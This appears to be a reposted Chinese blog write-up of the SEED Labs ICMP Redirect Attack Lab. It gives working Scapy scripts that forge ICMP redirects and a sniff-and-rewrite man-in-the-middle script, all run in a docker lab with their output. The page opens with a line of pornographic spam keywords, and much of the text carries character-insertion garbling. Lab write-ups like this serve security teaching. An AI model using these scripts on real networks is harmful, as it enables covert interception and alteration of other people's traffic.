国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【SEED Labs 2.0】ICMP Redirect Attack Lab

這篇具有很好參考價(jià)值的文章主要介紹了【SEED Labs 2.0】ICMP Redirect Attack Lab。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

本文為 SEED Labs 2.0 - ICMP Redirect Attack Lab 的實(shí)驗(yàn)記錄。

實(shí)驗(yàn)原理

ICMP 重定向是路由器向 IP 數(shù)據(jù)包發(fā)送者發(fā)送的錯(cuò)誤消息。 當(dāng)路由器認(rèn)為數(shù)據(jù)包被錯(cuò)誤地路由時(shí),使用重定向,并且它想通知發(fā)送者它應(yīng)該為隨后發(fā)送到同一目的地的數(shù)據(jù)包使用不同的路由器。攻擊者可以使用 ICMP 重定向來更改受害者的路由。
本實(shí)驗(yàn)的目的是對(duì)受害者發(fā)起 ICMP 重定向攻擊,這樣當(dāng)受害者向 192.168.60.5 發(fā)送數(shù)據(jù)包時(shí),它將使用惡意路由器容器(10.9.0.111)作為其路由器。由于惡意路由器被攻擊者控制,攻擊者可以截取數(shù)據(jù)包,進(jìn)行修改,然后將修改后的數(shù)據(jù)包發(fā)送出去。這是中間人 (MITM) 攻擊的一種形式。本實(shí)驗(yàn)涵蓋以下主題:

  • IP 和 ICMP 協(xié)議
  • ICMP 重定向攻擊
  • 路由

Task 1: Launching ICMP Redirect Attack

【SEED Labs 2.0】ICMP Redirect Attack Lab

啟動(dòng) docker:

$ dcbuild
$ dcup

首先修改 shell 以便查看:

# export PS1="\w victim-10.9.0.5$ "
# export PS1="\w attacker-10.9.0.105$ "
# export PS1="\w host-192.168.60.5$ "
# export PS1="\w malicious-router-10.9.0.111$ "

首先在 victim 上查看到 192.168.60.5 的路由:

victim-10.9.0.5$ mtr -n 192.168.60.5

【SEED Labs 2.0】ICMP Redirect Attack Lab

這里的路由是正常的。

然后保持其 ping 192.168.60.5:

victim-10.9.0.5$ ping 192.168.60.5 &

編寫 icmp.py

#!/usr/bin/python3

from scapy.all import *

ip = IP(src = '10.9.0.11', dst = '10.9.0.5')
icmp = ICMP(type=5, code=1)
icmp.gw = '10.9.0.111'

# The enclosed IP packet should be the one that
# triggers the redirect message.
ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')
send(ip/icmp/ip2/ICMP());

在 attacker 上運(yùn)行:

attacker-10.9.0.105$ icmp.py
.
Sent 1 packets.

此時(shí) victim 的路由改變:

victim-10.9.0.5$ mtr -n 192.168.60.5

【SEED Labs 2.0】ICMP Redirect Attack Lab

Question 1: Can you use ICMP redirect attacks to redirect to a remote machine? Namely, the IP address assigned to icmp.gw is a computer not on the local LAN. Please show your experiment result, and explain your observation.

修改程序:

#!/usr/bin/python3

from scapy.all import *

ip = IP(src = '10.9.0.11', dst = '10.9.0.5')
icmp = ICMP(type=5, code=1)
icmp.gw = '192.168.60.6'

# The enclosed IP packet should be the one that
# triggers the redirect message.
ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')
send(ip/icmp/ip2/ICMP());

然后保持victim ping 192.168.60.5

victim-10.9.0.5$ ping 192.168.60.5 &

清空 cache:

victim-10.9.0.5$ ip route flush cache

在 attacker 上運(yùn)行:

attacker-10.9.0.105$ icmp.py
.
Sent 1 packets.

此時(shí)查看 victim 的路由:

victim-10.9.0.5$ mtr -n 192.168.60.5

【SEED Labs 2.0】ICMP Redirect Attack Lab

可以看出,此時(shí)沒有變化。

Question 2: Can you use ICMP redirect attacks to redirect to a non-existing machine on the same network? Namely, the IP address assigned to icmp.gw is a local computer that is either offline or non-existing. Please show your experiment result, and explain your observation.

修改程序:

#!/usr/bin/python3

from scapy.all import *

ip = IP(src = '10.9.0.11', dst = '10.9.0.5')
icmp = ICMP(type=5, code=1)
icmp.gw = '10.9.0.99'

# The enclosed IP packet should be the one that
# triggers the redirect message.
ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')
send(ip/icmp/ip2/ICMP());

然后保持 victim ping 192.168.60.5

victim-10.9.0.5$ ping 192.168.60.5 &

清空 cache:

victim-10.9.0.5$ ip route flush cache

在 attacker 上運(yùn)行:

attacker-10.9.0.105$ icmp.py
.
Sent 1 packets.

此時(shí)查看 victim 的路由:

victim-10.9.0.5$ mtr -n 192.168.60.5

【SEED Labs 2.0】ICMP Redirect Attack Lab

可以看出,此時(shí)沒有變化。:

Question 3: If you look at the docker-compose.yml file, you will find the following entries for the malicious router container. What are the purposes of these entries? Please change their value to 1, and launch the attack again. Please describe and explain your observation.

修改 dockerfile:

- net.ipv4.conf.all.send_redirects=1
- net.ipv4.conf.default.send_redirects=1
- net.ipv4.conf.eth0.send_redirects=1

編寫 icmp.py:

#!/usr/bin/python3

from scapy.all import *

ip = IP(src = '10.9.0.11', dst = '10.9.0.5')
icmp = ICMP(type=5, code=1)
icmp.gw = '10.9.0.111'

# The enclosed IP packet should be the one that
# triggers the redirect message.
ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')
send(ip/icmp/ip2/ICMP());

在 attacker 上運(yùn)行:

attacker-10.9.0.105$ icmp.py
.
Sent 1 packets.

此時(shí)查看 victim 的路由:

victim-10.9.0.5$ mtr -n 192.168.60.5

【SEED Labs 2.0】ICMP Redirect Attack Lab

可以看到,也失敗了。

Task 2: Launching the MITM Attack

先把所有東西改回原樣。

關(guān)閉轉(zhuǎn)發(fā):

- net.ipv4.ip_forward=0

保持 victim ping 192.168.60.5:

victim-10.9.0.5$ ping 192.168.60.5 &

編寫 icmp.py:

#!/usr/bin/python3

from scapy.all import *

ip = IP(src = '10.9.0.11', dst = '10.9.0.5')
icmp = ICMP(type=5, code=1)
icmp.gw = '10.9.0.111'

# The enclosed IP packet should be the one that
# triggers the redirect message.
ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')
send(ip/icmp/ip2/ICMP());

在 attacker 上運(yùn)行:

attacker-10.9.0.105$ icmp.py
.
Sent 1 packets.

編寫 mitm.py

#!/usr/bin/env python3
from scapy.all import *

print("LAUNCHING MITM ATTACK.........")

def spoof_pkt(pkt):
   newpkt = IP(bytes(pkt[IP]))
   del(newpkt.chksum)
   del(newpkt[TCP].payload)
   del(newpkt[TCP].chksum)

   if pkt[TCP].payload:
       data = pkt[TCP].payload.load
       print("*** %s, length: %d" % (data, len(data)))

       # Replace a pattern
       newdata = data.replace(b'Chenyang', b'AAAAAAAA')

       send(newpkt/newdata)
   else: 
       send(newpkt)

f = 'tcp and ether src 02:42:0a:09:00:05' 
pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)

在 malicious-server 上運(yùn)行:

malicious-router-10.9.0.111$ mitm.py
LAUNCHING MITM ATTACK.........

在 host 上啟動(dòng) nc:

host-192.168.60.5$ nc -lp 9090

在 victim 上連接并發(fā)送內(nèi)容:

victim-10.9.0.5$ nc 192.168.60.5 9090
aaaa
Chenyang

host 接收到:

host-192.168.60.5$ nc -lp 9090
aaaa
AAAAAAAA

malicious-server 顯示:

malicious-router-10.9.0.111$ mitm.py
LAUNCHING MITM ATTACK.........
.
Sent 1 packets.
.
Sent 1 packets.
*** b'aaaa\n', length: 5
.
Sent 1 packets.
*** b'Chenyang\n', length: 9
.
Sent 1 packets.

可以看到,攻擊成功。

Question 4: In your MITM program, you only need to capture the traffics in one direction. Please indicate which direction, and explain why.

只需要過濾出 victim 到 host 的報(bào)文即可,因?yàn)樾枰薷牡膱?bào)文就在這個(gè)方向上。

Question 5: In the MITM program, when you capture the nc traffics from A (10.9.0.5), you can use A’s IP address or MAC address in the filter. One of the choices is not good and is going to create issues, even though both choices may work. Please try both, and use your experiment results to show which choice is the correct one, and please explain your conclusion.

修改 mitm.py

#!/usr/bin/env python3
from scapy.all import *

print("LAUNCHING MITM ATTACK.........")

def spoof_pkt(pkt):
   newpkt = IP(bytes(pkt[IP]))
   del(newpkt.chksum)
   del(newpkt[TCP].payload)
   del(newpkt[TCP].chksum)

   if pkt[TCP].payload:
       data = pkt[TCP].payload.load
       print("*** %s, length: %d" % (data, len(data)))

       # Replace a pattern
       newdata = data.replace(b'Chenyang', b'AAAAAAAA')

       send(newpkt/newdata)
   else: 
       send(newpkt)

f = 'tcp and src host 10.9.0.5' 
pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)

在 malicious-server 上運(yùn)行:

malicious-router-10.9.0.111$ mitm.py
LAUNCHING MITM ATTACK.........

在 host 上啟動(dòng) nc:

host-192.168.60.5$ nc -lp 9090

在 victim 上連接并發(fā)送內(nèi)容:

victim-10.9.0.5$ nc 192.168.60.5 9090
aaaa
Chenyang

host 接收到:

host-192.168.60.5$ nc -lp 9090
aaaa
AAAAAAAA

malicious-server 顯示:

malicious-router-10.9.0.111$ mitm.py
LAUNCHING MITM ATTACK.........
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
*** b'AAAAAAAA\n', length: 9
.
Sent 1 packets.
*** b'aaaa\n', length: 5

可以看到,攻擊成功。但是 malicious-server 卻在瘋狂地發(fā)送報(bào)文。這是因?yàn)樗东@到了自己發(fā)送的報(bào)文,發(fā)送完又捕獲到了,陷入了死循環(huán)。

實(shí)驗(yàn)總結(jié)

本實(shí)驗(yàn)較為簡(jiǎn)單。文章來源地址http://www.zghlxwxcb.cn/news/detail-445855.html

到了這里,關(guān)于【SEED Labs 2.0】ICMP Redirect Attack Lab的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【SEED Labs 2.0】Virtual Private Network (V*N) Lab

    【SEED Labs 2.0】Virtual Private Network (V*N) Lab

    本文為 SEED Labs 2.0 - Virtual Private Network (V*N) Lab 的實(shí)驗(yàn)記錄。 本實(shí)驗(yàn)要求完成 V*N 的實(shí)現(xiàn)。其應(yīng)當(dāng)支持 TUN 建立、隧道加密、服務(wù)器認(rèn)證、客戶端登錄、多用戶等功能。 本實(shí)驗(yàn)的實(shí)驗(yàn)手冊(cè)使用多虛擬機(jī)與 C 語言完成,而我們希望直接 使用 docker 和 Python 。我們一步到位完成了所

    2024年02月07日
    瀏覽(49)
  • 【SEED Labs 2.0】Public-Key Infrastructure (PKI) Lab

    【SEED Labs 2.0】Public-Key Infrastructure (PKI) Lab

    本文為 SEED Labs 2.0 - Public-Key Infrastructure (PKI) Lab 的實(shí)驗(yàn)記錄。 如今,公鑰密碼學(xué)已經(jīng)成為了安全通信的基礎(chǔ)。但是當(dāng)通信的一方將其公鑰發(fā)送給另一方時(shí),它會(huì)受到中間人攻擊。問題在于無法驗(yàn)證公鑰的所有權(quán)——即給定公鑰及其聲稱的所有者信息。我們?nèi)绾未_保公鑰確實(shí)由

    2024年02月07日
    瀏覽(42)
  • 初-SEED 2.0實(shí)驗(yàn)環(huán)境搭建

    初-SEED 2.0實(shí)驗(yàn)環(huán)境搭建

    SEED LABS是一系列的網(wǎng)絡(luò)安全實(shí)驗(yàn),其基本囊括了信息安全本科生所涉及到的幾乎每個(gè)方面,例如軟件安全,Web安全,密碼學(xué)安全等。而每一個(gè)方面的實(shí)驗(yàn)又由好幾個(gè)單獨(dú)的實(shí)驗(yàn)組成。 不需要物理的實(shí)驗(yàn)空間。 不需要專門的機(jī)器,所有的實(shí)驗(yàn)任務(wù)都可以在學(xué)生的電腦上完成。

    2024年02月09日
    瀏覽(21)
  • 網(wǎng)絡(luò)攻防技術(shù)-Lab5-shellcode編寫實(shí)驗(yàn)(SEED Labs – Shellcode Development Lab)

    網(wǎng)絡(luò)攻防技術(shù)-Lab5-shellcode編寫實(shí)驗(yàn)(SEED Labs – Shellcode Development Lab)

    網(wǎng)絡(luò)攻防技術(shù)實(shí)驗(yàn),實(shí)驗(yàn)環(huán)境、實(shí)驗(yàn)說明、實(shí)驗(yàn)代碼見 Shellcode Development Lab 1) 編譯mysh.s得到二進(jìn)制文件 2) 執(zhí)行 1)中的二進(jìn)制文件 ,結(jié)果如下圖, 我們 看到運(yùn)行mysh之前的PID與運(yùn)行mysh之后的PID是不同的,證明我們通過mysh啟動(dòng)了一個(gè)新的shell。 3) 獲取機(jī)器碼,以便進(jìn)一步

    2023年04月13日
    瀏覽(43)
  • [SEEDLabs] Meltdown & Spectre Attack Labs

    [SEEDLabs] Meltdown & Spectre Attack Labs

    系統(tǒng)安全分類下的兩個(gè)實(shí)驗(yàn),放在一起寫。Meltdown 和 Spectre 是兩個(gè)關(guān)于體系結(jié)構(gòu)的漏洞,主要是利用了緩沖延時(shí)的側(cè)信道攻擊方法。 這次實(shí)驗(yàn)用的是官方網(wǎng)站發(fā)布的預(yù)裝環(huán)境的Ubuntu16,看官網(wǎng)的說明meltdown的大部分的實(shí)驗(yàn)在Ubuntu20上面也可以做,但是還是有不行的,spectre的話

    2024年02月05日
    瀏覽(21)
  • 【SEED LAB】Cross-Site Request Forgery (CSRF) Attack Lab -跨站請(qǐng)求偽造

    【SEED LAB】Cross-Site Request Forgery (CSRF) Attack Lab -跨站請(qǐng)求偽造

    實(shí)際上,用戶網(wǎng)頁對(duì)于網(wǎng)址的請(qǐng)求分為兩種。一種是用戶瀏覽器發(fā)送給相同網(wǎng)站的數(shù)據(jù),被稱為 same-site request 。相反,用戶瀏覽器發(fā)送給其他網(wǎng)站的數(shù)據(jù)被稱為 cross-site request 也就是跨境請(qǐng)求。 在HTTP傳輸過程中,產(chǎn)生的響應(yīng)形式一般分成兩種。一種是 GET 型,另一種是 POST

    2024年02月09日
    瀏覽(23)
  • Packet Sniffing and Spoofing Lab(報(bào)文嗅探&欺騙SEED 實(shí)驗(yàn))

    Packet Sniffing and Spoofing Lab(報(bào)文嗅探&欺騙SEED 實(shí)驗(yàn))

    本次實(shí)驗(yàn)的目的有兩點(diǎn):學(xué)習(xí)使用報(bào)文嗅探欺騙的工具、理解其背后的原理。 本次實(shí)驗(yàn)使用處在同一局域網(wǎng)下的三臺(tái)機(jī)器,使用docker運(yùn)行,其文件在官網(wǎng)上可以下載,具體使用方法可以參考我的PKI實(shí)驗(yàn)報(bào)告。網(wǎng)絡(luò)拓?fù)淙鐖D: 1.1 嗅探報(bào)文 最簡(jiǎn)單的一個(gè)嗅探代碼,利用 ifconfi

    2024年02月07日
    瀏覽(47)
  • 實(shí)驗(yàn):IP 與 ICMP 分析

    實(shí)驗(yàn):IP 與 ICMP 分析

    IP 和 ICMP 協(xié)議是 TCP/IP 協(xié)議簇中的網(wǎng)絡(luò)層協(xié)議,在網(wǎng)絡(luò)尋址定位、數(shù)據(jù)分組轉(zhuǎn)發(fā)和路由選擇等任務(wù)中發(fā)揮了重要作用。本實(shí)驗(yàn)要求熟練使用 Wireshark 軟件,觀察 IP數(shù)據(jù)報(bào)的基本結(jié)構(gòu),分析數(shù)據(jù)報(bào)的分片;掌握基于 ICMP 協(xié)議的 ping 和 traceroute 命令其工作原理? 啟動(dòng) Wireshark,捕捉

    2024年02月04日
    瀏覽(18)
  • 《計(jì)算機(jī)網(wǎng)絡(luò)—自頂向下方法》 Wireshark實(shí)驗(yàn)(八):ICMP 協(xié)議分析

    《計(jì)算機(jī)網(wǎng)絡(luò)—自頂向下方法》 Wireshark實(shí)驗(yàn)(八):ICMP 協(xié)議分析

    ????????ICMP(Internet Control Message Protocol)網(wǎng)絡(luò)控制報(bào)文協(xié)議。它是 TCP/IP 協(xié)議簇的一個(gè)子協(xié)議,用于在 IP 主機(jī)、路由器之間傳遞控制消息??刂葡⑹侵妇W(wǎng)絡(luò)通不通、主機(jī)是否可達(dá)、路由是否可用等網(wǎng)絡(luò)本身的消息。這些控制消息雖然并不傳輸用戶數(shù)據(jù),但是對(duì)于用戶數(shù)

    2024年01月25日
    瀏覽(24)
  • 阿里巴巴人工智能實(shí)驗(yàn)室(Ali A.I. Labs)負(fù)責(zé)人淺雪近期問答整理

    阿里巴巴人工智能實(shí)驗(yàn)室(Ali A.I. Labs)負(fù)責(zé)人淺雪近期問答整理

    目前開發(fā)者平臺(tái)成為大廠兵家必爭(zhēng)之地。谷歌開發(fā)者平臺(tái),緊隨其后百度的AI開發(fā)者平臺(tái),科大訊飛開放平臺(tái)(挑了一個(gè)1024大吉大利的日子發(fā)布)。人工智能時(shí)代,連硬件廠商曙光都開始做開發(fā)者平臺(tái)了(10月24日,曙光發(fā)布系列人工智能軟硬件平臺(tái)?;谧约矣布?wù)器提供

    2024年02月15日
    瀏覽(37)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包